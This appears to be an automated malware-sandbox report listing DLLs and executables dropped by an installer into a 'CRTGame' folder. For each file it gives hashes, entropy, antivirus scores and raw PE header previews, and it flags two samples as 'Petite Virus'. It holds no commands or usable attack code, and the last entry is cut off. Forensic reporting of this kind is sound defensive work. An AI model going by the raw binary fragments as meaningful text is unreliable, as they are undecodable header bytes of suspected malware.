                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):126478
                                                                            Entropy (8bit):6.268811819718352
                                                                            Encrypted:false
                                                                            SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                            MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                            SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                            SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                            SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):648384
                                                                            Entropy (8bit):6.666474522542094
                                                                            Encrypted:false
                                                                            SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                            MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                            SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                            SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                            SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):149845
                                                                            Entropy (8bit):7.893881970959476
                                                                            Encrypted:false
                                                                            SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                            MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                            SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                            SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                            SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):39304
                                                                            Entropy (8bit):7.819409739152795
                                                                            Encrypted:false
                                                                            SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                            MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                            SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                            SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                            SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.|w.t...\..dkB%..i.cX...`*B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S*..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):17472
                                                                            Entropy (8bit):7.524548435291935
                                                                            Encrypted:false
                                                                            SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                            MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                            SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                            SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                            SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........|...CC.......p......n....<.......`..............lH......)...............
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):258560
                                                                            Entropy (8bit):6.491223412910377
                                                                            Encrypted:false
                                                                            SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                            MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                            SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                            SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                            SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):197646
                                                                            Entropy (8bit):6.1570532273946625
                                                                            Encrypted:false
                                                                            SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                            MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                            SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                            SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                            SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):5960
                                                                            Entropy (8bit):5.956401374574174
                                                                            Encrypted:false
                                                                            SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                            MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                            SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                            SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                            SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):240654
                                                                            Entropy (8bit):6.518503846592995
                                                                            Encrypted:false
                                                                            SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                            MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                            SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                            SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                            SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):22542
                                                                            Entropy (8bit):5.5875455203930615
                                                                            Encrypted:false
                                                                            SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                            MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                            SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                            SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                            SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):227328
                                                                            Entropy (8bit):6.641153481093122
                                                                            Encrypted:false
                                                                            SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                            MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                            SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                            SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                            SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):68876
                                                                            Entropy (8bit):7.922125376804506
                                                                            Encrypted:false
                                                                            SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                            MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                            SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                            SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                            SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):845312
                                                                            Entropy (8bit):6.581151900686739
                                                                            Encrypted:false
                                                                            SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                            MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                            SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                            SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                            SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):562190
                                                                            Entropy (8bit):6.388293171196564
                                                                            Encrypted:false
                                                                            SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                            MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                            SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                            SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                            SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):43520
                                                                            Entropy (8bit):6.232860260916194
                                                                            Encrypted:false
                                                                            SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                            MD5:B162992412E08888456AE13BA8BD3D90
                                                                            SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                            SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                            SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):19008
                                                                            Entropy (8bit):7.672481244971812
                                                                            Encrypted:false
                                                                            SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                            MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                            SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                            SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                            SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):294926
                                                                            Entropy (8bit):6.191604766067493
                                                                            Encrypted:false
                                                                            SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                            MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                            SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                            SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                            SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):266254
                                                                            Entropy (8bit):6.343813822604148
                                                                            Encrypted:false
                                                                            SSDEEP:3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
                                                                            MD5:8B099FA7B51A8462683BD6FF5224A2DC
                                                                            SHA1:C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
                                                                            SHA-256:438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
                                                                            SHA-512:9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):8456
                                                                            Entropy (8bit):6.767152008521429
                                                                            Encrypted:false
                                                                            SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                            MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                            SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                            SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                            SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                            Malicious:false
                                                                            Yara Hits:
